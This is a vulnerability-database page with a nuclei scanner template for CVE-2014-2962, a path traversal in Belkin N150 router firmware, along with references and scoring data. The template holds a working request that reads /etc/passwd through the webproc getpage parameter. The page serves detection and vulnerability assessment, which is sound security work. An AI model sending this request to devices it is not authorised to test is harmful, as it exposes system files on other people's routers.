Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Belkin N150 Router 1.00.08/1.00.09 - Path Traversal

🗓️ 17 Jun 2026 05:14:44Reported by ProjectDiscoveryType 
nuclei
 nuclei🔗 github.com👁 26 Views

Belkin N150 Router 1.00.08/1.00.09 - Path Traversal vulnerability in webproc cgi modul

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today		Belkin Router N150 1.00.08, 1.00.09 - Path Traversal Vulnerability
19 Oct 201500:00
zdt
CVE		CVE-2014-2962
19 Jun 201410:00
cve
Cvelist		CVE-2014-2962
19 Jun 201410:00
cvelist
NVD		CVE-2014-2962
19 Jun 201410:50
nvd
OpenVAS		Belkin Router Directory Traversal Vulnerability (Oct 2015) - Active Check
29 Oct 201500:00
openvas
Prion		Path traversal
19 Jun 201410:50
prion
CERT		Belkin N150 path traversal vulnerability
18 Jun 201400:00
cert
id: CVE-2014-2962

info:
  name: Belkin N150 Router 1.00.08/1.00.09 - Path Traversal
  author: daffainfo
  severity: high
  description: A path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter.
  impact: |
    An attacker can exploit this vulnerability to view sensitive files, potentially leading to unauthorized access, data leakage, or further compromise of the system.
  remediation: Ensure that appropriate firewall rules are in place to restrict access to port 80/tcp from external untrusted sources.
  reference:
    - https://www.kb.cert.org/vuls/id/774788
    - https://nvd.nist.gov/vuln/detail/CVE-2014-2962l
    - http://www.kb.cert.org/vuls/id/774788
    - http://www.belkin.com/us/support-article?articleNum=109400
    - https://www.exploit-db.com/exploits/38488/
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N
    cvss-score: 7.8
    cve-id: CVE-2014-2962
    cwe-id: CWE-22
    epss-score: 0.47374
    epss-percentile: 0.98689
    cpe: cpe:2.3:o:belkin:n150_f9k1009_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: belkin
    product: n150_f9k1009_firmware
  tags: cve2014,cve,lfi,router,firmware,traversal,belkin,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a004630440220717a9bd5b01cf1f0d21260b1d7ba837e3cef170b081a2a350107b1fe62e50aba022023db4e18471e440c9d3c7795385f2b25642dee81dbeaefbe5cd48b41eab0c894:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Feb 2026 07:00Current
5.5Medium risk
Vulners AI Score5.5
CVSS 27.8
EPSS0.47374
belkinrouterfirmwarepath traversalcve-2014-2962lfi
26